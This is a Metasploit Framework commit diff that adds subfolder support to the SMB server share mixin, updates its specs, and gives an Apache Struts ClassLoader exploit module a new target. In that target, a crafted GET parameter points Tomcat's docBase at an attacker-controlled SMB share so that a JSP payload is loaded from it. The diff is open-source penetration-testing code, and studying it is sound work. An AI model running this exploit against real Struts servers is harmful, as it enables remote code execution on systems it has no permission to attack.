Merging #3323 work
commit
9f3f8bb727
|
@ -175,10 +175,9 @@ module Msf
|
||||||
# @!attribute share
|
# @!attribute share
|
||||||
# @return [String] The share portion of the provided UNC.
|
# @return [String] The share portion of the provided UNC.
|
||||||
attr_accessor :share
|
attr_accessor :share
|
||||||
# @!attribute path_name
|
# @!attribute folder_name
|
||||||
# @return [String] The folder where the provided file lives.
|
# @return [String] The folder where the provided file lives.
|
||||||
# @note UNSUPPORTED
|
attr_accessor :folder_name
|
||||||
attr_accessor :path_name
|
|
||||||
# @!attribute file_name
|
# @!attribute file_name
|
||||||
# @return [String] The file name of the provided UNC.
|
# @return [String] The file name of the provided UNC.
|
||||||
attr_accessor :file_name
|
attr_accessor :file_name
|
||||||
|
@ -199,6 +198,7 @@ module Msf
|
||||||
[
|
[
|
||||||
OptString.new('SHARE', [ false, 'Share (Default Random)']),
|
OptString.new('SHARE', [ false, 'Share (Default Random)']),
|
||||||
OptString.new('FILE_NAME', [ false, 'File name to share (Default Random)']),
|
OptString.new('FILE_NAME', [ false, 'File name to share (Default Random)']),
|
||||||
|
OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default none)']),
|
||||||
OptPath.new('FILE_CONTENTS', [ false, 'File contents (Default Random)'])
|
OptPath.new('FILE_CONTENTS', [ false, 'File contents (Default Random)'])
|
||||||
], Msf::Exploit::Remote::SMB::Server::Share)
|
], Msf::Exploit::Remote::SMB::Server::Share)
|
||||||
end
|
end
|
||||||
|
@ -207,7 +207,7 @@ module Msf
|
||||||
def setup
|
def setup
|
||||||
super
|
super
|
||||||
|
|
||||||
self.path_name = '\\' # TODO: Add subdirectories support
|
self.folder_name = datastore['FOLDER_NAME']
|
||||||
self.share = datastore['SHARE'] || Rex::Text.rand_text_alpha(4 + rand(3))
|
self.share = datastore['SHARE'] || Rex::Text.rand_text_alpha(4 + rand(3))
|
||||||
self.file_name = datastore['FILE_NAME'] || Rex::Text.rand_text_alpha(4 + rand(3))
|
self.file_name = datastore['FILE_NAME'] || Rex::Text.rand_text_alpha(4 + rand(3))
|
||||||
|
|
||||||
|
@ -224,7 +224,13 @@ module Msf
|
||||||
|
|
||||||
# Builds the UNC Name for the shared file
|
# Builds the UNC Name for the shared file
|
||||||
def unc
|
def unc
|
||||||
"\\\\#{srvhost}\\#{share}\\#{file_name}"
|
if folder_name
|
||||||
|
path = "\\\\#{srvhost}\\#{share}\\#{folder_name}\\#{file_name}"
|
||||||
|
else
|
||||||
|
path = "\\\\#{srvhost}\\#{share}\\#{file_name}"
|
||||||
|
end
|
||||||
|
|
||||||
|
path
|
||||||
end
|
end
|
||||||
|
|
||||||
# Builds the server address.
|
# Builds the server address.
|
||||||
|
|
|
@ -32,7 +32,12 @@ module Msf
|
||||||
attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||||
eof = file_contents.length
|
eof = file_contents.length
|
||||||
is_dir = 0
|
is_dir = 0
|
||||||
elsif payload.eql?(path_name.downcase)
|
elsif folder_name && payload.ends_with?(folder_name.downcase)
|
||||||
|
fid = smb[:dir_id].to_i
|
||||||
|
attribs = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
|
eof = 0
|
||||||
|
is_dir = 1
|
||||||
|
elsif payload == "\\"
|
||||||
fid = smb[:dir_id].to_i
|
fid = smb[:dir_id].to_i
|
||||||
attribs = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
attribs = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
eof = 0
|
eof = 0
|
||||||
|
|
|
@ -87,8 +87,8 @@ module Msf
|
||||||
def smb_expand(path)
|
def smb_expand(path)
|
||||||
search_path = path.gsub(/<\./, '*.') # manage wildcards
|
search_path = path.gsub(/<\./, '*.') # manage wildcards
|
||||||
extension = File.extname(file_name)
|
extension = File.extname(file_name)
|
||||||
if search_path == "#{path_name}*#{extension}"
|
if search_path =~ /\\\*#{extension}$/
|
||||||
search_path = "#{path_name}#{file_name}"
|
search_path.gsub!(/\\\*#{extension}$/, "\\#{file_name}")
|
||||||
end
|
end
|
||||||
|
|
||||||
search_path
|
search_path
|
||||||
|
|
|
@ -21,8 +21,15 @@ module Msf
|
||||||
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
|
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||||
search = 1
|
search = 1
|
||||||
elsif path && path == path_name.downcase
|
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||||
data = Rex::Text.to_unicode(path_name)
|
data = Rex::Text.to_unicode(path)
|
||||||
|
length = 0
|
||||||
|
ea = 0x21
|
||||||
|
alloc = 0 # 0Mb
|
||||||
|
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
|
search = 0x100
|
||||||
|
elsif path && path == "\\"
|
||||||
|
data = Rex::Text.to_unicode(path)
|
||||||
length = 0
|
length = 0
|
||||||
ea = 0x21
|
ea = 0x21
|
||||||
alloc = 0 # 0Mb
|
alloc = 0 # 0Mb
|
||||||
|
@ -52,8 +59,10 @@ module Msf
|
||||||
def smb_cmd_find_file_names_info(c, path)
|
def smb_cmd_find_file_names_info(c, path)
|
||||||
if path && path.include?(file_name.downcase)
|
if path && path.include?(file_name.downcase)
|
||||||
data = Rex::Text.to_unicode(file_name)
|
data = Rex::Text.to_unicode(file_name)
|
||||||
elsif path && path == path_name.downcase
|
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||||
data = Rex::Text.to_unicode(path_name)
|
data = Rex::Text.to_unicode(path)
|
||||||
|
elsif path && path == "\\"
|
||||||
|
data = Rex::Text.to_unicode(path)
|
||||||
else
|
else
|
||||||
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_NO_SUCH_FILE, true)
|
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_NO_SUCH_FILE, true)
|
||||||
end
|
end
|
||||||
|
@ -68,6 +77,7 @@ module Msf
|
||||||
# @param path [String] The path which the client is requesting info from.
|
# @param path [String] The path which the client is requesting info from.
|
||||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||||
def smb_cmd_find_file_full_directory_info(c, path)
|
def smb_cmd_find_file_full_directory_info(c, path)
|
||||||
|
|
||||||
if path && path.include?(file_name.downcase)
|
if path && path.include?(file_name.downcase)
|
||||||
data = Rex::Text.to_unicode(file_name)
|
data = Rex::Text.to_unicode(file_name)
|
||||||
length = file_contents.length
|
length = file_contents.length
|
||||||
|
@ -75,8 +85,15 @@ module Msf
|
||||||
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
|
alloc = 1048576 # Allocation Size = 1048576 || 1Mb
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File
|
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File
|
||||||
search = 0x100
|
search = 0x100
|
||||||
elsif path && path == path_name.downcase
|
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||||
data = Rex::Text.to_unicode(path_name)
|
data = Rex::Text.to_unicode(path)
|
||||||
|
length = 0
|
||||||
|
ea = 0x21
|
||||||
|
alloc = 0 # 0Mb
|
||||||
|
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
|
search = 1
|
||||||
|
elsif path && path == "\\"
|
||||||
|
data = Rex::Text.to_unicode(path)
|
||||||
length = 0
|
length = 0
|
||||||
ea = 0x21
|
ea = 0x21
|
||||||
alloc = 0 # 0Mb
|
alloc = 0 # 0Mb
|
||||||
|
|
|
@ -48,15 +48,12 @@ module Msf
|
||||||
# @param c [Socket] The client sending the request.
|
# @param c [Socket] The client sending the request.
|
||||||
# @param path [String] The path which the client is requesting info from.
|
# @param path [String] The path which the client is requesting info from.
|
||||||
# @return [Fixnum] The number of bytes returned to the client as response.
|
# @return [Fixnum] The number of bytes returned to the client as response.
|
||||||
# @todo Delete elsif comment if testing proofs it as unnecessary
|
|
||||||
def smb_cmd_trans_query_path_info_basic(c, path)
|
def smb_cmd_trans_query_path_info_basic(c, path)
|
||||||
if path && path.ends_with?(file_name.downcase)
|
if path && path.ends_with?(file_name.downcase)
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||||
#elsif path && path.ends_with?(file_name + '.Local')
|
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||||
#attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
|
||||||
elsif path && path == path_name.downcase
|
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
elsif path.nil? || path.empty? || path == "\x00" # empty path
|
elsif path.nil? || path.empty? || path == "\x00" || path == "\\" # empty path
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
else
|
else
|
||||||
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_OBJECT_NAME_NOT_FOUND, true)
|
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_OBJECT_NAME_NOT_FOUND, true)
|
||||||
|
@ -74,9 +71,9 @@ module Msf
|
||||||
def smb_cmd_trans_query_path_info_standard(c, path)
|
def smb_cmd_trans_query_path_info_standard(c, path)
|
||||||
if path && path.include?(file_name.downcase)
|
if path && path.include?(file_name.downcase)
|
||||||
attrib = 0 # File attributes => file
|
attrib = 0 # File attributes => file
|
||||||
elsif path && path == path_name.downcase
|
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||||
attrib = 1 # File attributes => directory
|
attrib = 1 # File attributes => directory
|
||||||
elsif path.nil? || path.empty? || path == "\x00" # empty path
|
elsif path.nil? || path.empty? || path == "\x00" || path == "\\" # empty path
|
||||||
attrib = 1 # File attributes => directory
|
attrib = 1 # File attributes => directory
|
||||||
else
|
else
|
||||||
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_OBJECT_NAME_NOT_FOUND, true)
|
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_OBJECT_NAME_NOT_FOUND, true)
|
||||||
|
@ -101,9 +98,9 @@ module Msf
|
||||||
|
|
||||||
if path && path.include?(file_name.downcase)
|
if path && path.include?(file_name.downcase)
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
|
||||||
elsif path && path == path_name.downcase
|
elsif path && folder_name && path.ends_with?(folder_name.downcase)
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
elsif path.nil? || path.empty? || path == "\x00" # empty path
|
elsif path.nil? || path.empty? || path == "\x00" || path == "\\" # empty path
|
||||||
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
|
||||||
else
|
else
|
||||||
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_OBJECT_NAME_NOT_FOUND, true)
|
return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_OBJECT_NAME_NOT_FOUND, true)
|
||||||
|
|
|
@ -8,9 +8,10 @@ require 'msf/core'
|
||||||
class Metasploit3 < Msf::Exploit::Remote
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
Rank = ManualRanking # It's going to manipulate the Class Loader
|
Rank = ManualRanking # It's going to manipulate the Class Loader
|
||||||
|
|
||||||
include Msf::Exploit::Remote::HttpClient
|
|
||||||
include Msf::Exploit::EXE
|
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
|
include Msf::Exploit::EXE
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Exploit::Remote::SMB::Server::Share
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
|
@ -27,7 +28,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
[
|
[
|
||||||
'Mark Thomas', # Vulnerability Discovery
|
'Mark Thomas', # Vulnerability Discovery
|
||||||
'Przemyslaw Celej', # Vulnerability Discovery
|
'Przemyslaw Celej', # Vulnerability Discovery
|
||||||
'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
|
'Redsadic <julian.vilas[at]gmail.com>', # Metasploit Module
|
||||||
|
'Matthew Hall <hallm[at]sec-1.com>' # SMB target
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
|
@ -46,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Space' => 5000,
|
'Space' => 5000,
|
||||||
'DisableNops' => true
|
'DisableNops' => true
|
||||||
},
|
},
|
||||||
|
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
['Java',
|
['Java',
|
||||||
|
@ -65,6 +68,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Platform' => 'win'
|
'Platform' => 'win'
|
||||||
}
|
}
|
||||||
|
],
|
||||||
|
['Windows / Tomcat 6 & 7 (Remote SMB Resource)',
|
||||||
|
{
|
||||||
|
'Arch' => ARCH_JAVA,
|
||||||
|
'Platform' => 'win'
|
||||||
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Mar 06 2014',
|
'DisclosureDate' => 'Mar 06 2014',
|
||||||
|
@ -73,9 +82,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(8080),
|
Opt::RPORT(8080),
|
||||||
|
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']]),
|
||||||
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/struts2-blank/example/HelloWorld.action"]),
|
||||||
OptEnum.new('STRUTS_VERSION', [ true, 'Apache Struts Framework version', '2.x', ['1.x','2.x']])
|
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10]),
|
||||||
|
OptString.new('FILE_NAME', [ true, 'The JSP file with the payload (target dependant)', 'HelloWorld.jsp']),
|
||||||
|
OptString.new('FOLDER_NAME', [ true, 'The Folder where the JSP payload lives (target dependant)', 'example'])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
deregister_options('FILE_CONTENTS')
|
||||||
end
|
end
|
||||||
|
|
||||||
def jsp_dropper(file, exe)
|
def jsp_dropper(file, exe)
|
||||||
|
@ -199,6 +213,34 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
if target.name =~ /Remote SMB Resource/
|
||||||
|
begin
|
||||||
|
Timeout.timeout(datastore['SMB_DELAY']) { super }
|
||||||
|
rescue Timeout::Error
|
||||||
|
# do nothing... just finish exploit and stop smb server...
|
||||||
|
end
|
||||||
|
else
|
||||||
|
class_loader_exploit
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
# Used with SMB targets
|
||||||
|
def primer
|
||||||
|
self.file_contents = payload.encoded
|
||||||
|
print_status("JSP payload available on #{unc}...")
|
||||||
|
|
||||||
|
print_status("#{peer} - Modifying Class Loader...")
|
||||||
|
send_request_cgi({
|
||||||
|
'uri' => normalize_uri(target_uri.path.to_s),
|
||||||
|
'version' => '1.1',
|
||||||
|
'method' => 'GET',
|
||||||
|
'vars_get' => {
|
||||||
|
'class.classLoader.resources.dirContext.docBase' => "\\\\#{srvhost}\\#{share}"
|
||||||
|
}
|
||||||
|
})
|
||||||
|
end
|
||||||
|
|
||||||
|
def class_loader_exploit
|
||||||
prefix_jsp = rand_text_alphanumeric(3+rand(3))
|
prefix_jsp = rand_text_alphanumeric(3+rand(3))
|
||||||
date_format = rand_text_numeric(1+rand(4))
|
date_format = rand_text_numeric(1+rand(4))
|
||||||
@jsp_file = prefix_jsp + date_format + ".jsp"
|
@jsp_file = prefix_jsp + date_format + ".jsp"
|
||||||
|
|
|
@ -64,6 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
|
OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
deregister_options('FOLDER_NAME')
|
||||||
deregister_options('FILE_CONTENTS')
|
deregister_options('FILE_CONTENTS')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -61,6 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
|
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
|
||||||
], self.class)
|
], self.class)
|
||||||
|
|
||||||
|
deregister_options('FOLDER_NAME')
|
||||||
deregister_options('FILE_CONTENTS')
|
deregister_options('FILE_CONTENTS')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
@ -79,7 +79,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'false.exe'
|
mod.file_name = 'false.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -67,7 +67,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'false.exe'
|
mod.file_name = 'false.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -78,7 +78,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'false.exe'
|
mod.file_name = 'false.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -36,7 +36,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'test.exe'
|
mod.file_name = 'test.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -35,7 +35,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'test.exe'
|
mod.file_name = 'test.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -48,7 +48,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'test.exe'
|
mod.file_name = 'test.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -78,7 +78,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'test.exe'
|
mod.file_name = 'test.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
|
@ -84,7 +84,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'test.exe'
|
mod.file_name = 'test.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
@ -198,7 +197,7 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
smb_data = Rex::Proto::SMB::Constants::SMB_FIND_FILE_BOTH_DIRECTORY_INFO_HDR.make_struct
|
smb_data = Rex::Proto::SMB::Constants::SMB_FIND_FILE_BOTH_DIRECTORY_INFO_HDR.make_struct
|
||||||
smb_data.from_s(data)
|
smb_data.from_s(data)
|
||||||
|
|
||||||
expect(smb_data.v['FileName']).to eq(Rex::Text.to_unicode(mod.path_name))
|
expect(smb_data.v['FileName']).to eq(Rex::Text.to_unicode(folder_path))
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -263,7 +262,7 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
smb_data = Rex::Proto::SMB::Constants::SMB_FIND_FILE_NAMES_INFO_HDR.make_struct
|
smb_data = Rex::Proto::SMB::Constants::SMB_FIND_FILE_NAMES_INFO_HDR.make_struct
|
||||||
smb_data.from_s(data)
|
smb_data.from_s(data)
|
||||||
|
|
||||||
expect(smb_data.v['FileName']).to eq(Rex::Text.to_unicode(mod.path_name))
|
expect(smb_data.v['FileName']).to eq(Rex::Text.to_unicode(folder_path))
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
@ -328,7 +327,7 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
smb_data = Rex::Proto::SMB::Constants::SMB_FIND_FILE_FULL_DIRECTORY_INFO_HDR.make_struct
|
smb_data = Rex::Proto::SMB::Constants::SMB_FIND_FILE_FULL_DIRECTORY_INFO_HDR.make_struct
|
||||||
smb_data.from_s(data)
|
smb_data.from_s(data)
|
||||||
|
|
||||||
expect(smb_data.v['FileName']).to eq(Rex::Text.to_unicode(mod.path_name))
|
expect(smb_data.v['FileName']).to eq(Rex::Text.to_unicode(folder_path))
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -79,7 +79,6 @@ describe Msf::Exploit::Remote::SMB::Server::Share do
|
||||||
mod.lo = 0
|
mod.lo = 0
|
||||||
mod.hi = 0
|
mod.hi = 0
|
||||||
mod.share = 'test'
|
mod.share = 'test'
|
||||||
mod.path_name = "\\"
|
|
||||||
mod.file_name = 'test.exe'
|
mod.file_name = 'test.exe'
|
||||||
mod.file_contents = 'metasploit'
|
mod.file_contents = 'metasploit'
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue